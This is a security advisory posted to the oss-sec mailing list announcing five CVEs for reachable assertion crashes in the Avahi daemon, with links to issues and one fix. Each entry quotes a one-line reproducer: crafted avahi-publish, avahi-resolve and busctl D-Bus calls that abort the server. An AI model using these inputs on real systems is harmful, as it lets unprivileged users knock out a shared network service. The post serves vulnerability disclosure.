oss-sec mailing list archives
CVEs assigned for reachable assertions in avahi
From: Alan Coopersmith <alan.coopersmith () oracle com>
Date: Fri, 6 Oct 2023 14:19:17 -0700
While the CVE database still shows them as reserved, Red Hat's & Debian's trackers show several CVE's being assigned for client requests that can cause the Avahi server to abort with an assertion failure. Only one of them has a fix available so far. ---------------------------------------------------------------------------- CVE-2023-38469: https://github.com/lathiat/avahi/issues/455 Reachable assertion in avahi_dns_packet_append_record "It can be triggered by unprivileged local users (unless disable-user-service-publishing is set to yes explicitly): avahi-publish -s T _qotd._tcp 22 $(perl -le 'print "A " x 100000')" ---------------------------------------------------------------------------- CVE-2023-38470: https://github.com/lathiat/avahi/issues/454 Reachable assertion in avahi_escape_label "avahi-resolve -n ',.=.}.=.?-.}.=.?.?.}.}.?.?.?.z.?.?.}.}.}.?.?.?.r.=.=.}.=.?.}}.}.?.?.?.zM.=.=.?.?.}.}.?.?.}.}.}.?.?.?.r.=.=.}.=.?.}}.}.?.?.?.zM.=.=.?.?.}.}.?.?.?.zM.?`?.}.}.}.?.?.?.r.=.?.}.=.?.?.}.?.?.?.}.=.?.?.}??.}.}.?.?.?.z.?.?.}.}.}.?.?.?.r.=.=.}.=.?.}}.}.?.?.?.zM.?`?.}.}.}.??.?.zM.?`?.}.}.}.?.?.?.r.=.?.}.=.?.?.}.?.?.?.}.=.?.?.}??.}.}.?.?.?.z.?.?.}.}.}.?.?.?.r.=.=.}.=.?.}}.}.?.?.?.zM.?`?.}.}.}.?.?.?.r.=.=.?.?`.?.?}.}.}.?.?.?.r.=.?.}.=.?.?.}.?.?.?.}.=.?.?.}'" Fix: https://github.com/lathiat/avahi/commit/94cb6489114636940ac683515417990b55b5d66c ---------------------------------------------------------------------------- CVE-2023-38471: https://github.com/lathiat/avahi/issues/453 Reachable assertion in dbus_set_host_name "It can be triggered by unprivileged local users unless 1c599d8 is backported. busctl call org.freedesktop.Avahi / org.freedesktop.Avahi.Server2 SetHostName "s" 'A\.B'" ---------------------------------------------------------------------------- CVE-2023-38472: https://github.com/lathiat/avahi/issues/452 Reachable assertion in avahi_rdata_parse "It can be reproduced by calling something like org.freedesktop.Avahi /Client*/EntryGroup* org.freedesktop.Avahi.EntryGroup AddRecord "iiusqquay" 0 0 0 '' 0 0 0 0 using avahi_entry_group_add_record (group, AVAHI_IF_UNSPEC, AVAHI_PROTO_UNSPEC, 0, "Test", 0x01, 0x10, 120, "", 0) from inside a client creating EntryGroups. It can be triggered by unprivileged users unless disable-user-service-publishing is set to yes explicitly. By default it's set to no." ---------------------------------------------------------------------------- CVE-2023-38473: https://github.com/lathiat/avahi/issues/451 Reachable assertion in avahi_alternative_host_name "busctl call org.freedesktop.Avahi / org.freedesktop.Avahi.Server GetAlternativeHostName "s" ').'" -- -Alan Coopersmith- alan.coopersmith () oracle com Oracle Solaris Engineering - https://blogs.oracle.com/solaris
Current thread:
- CVEs assigned for reachable assertions in avahi Alan Coopersmith (Oct 06)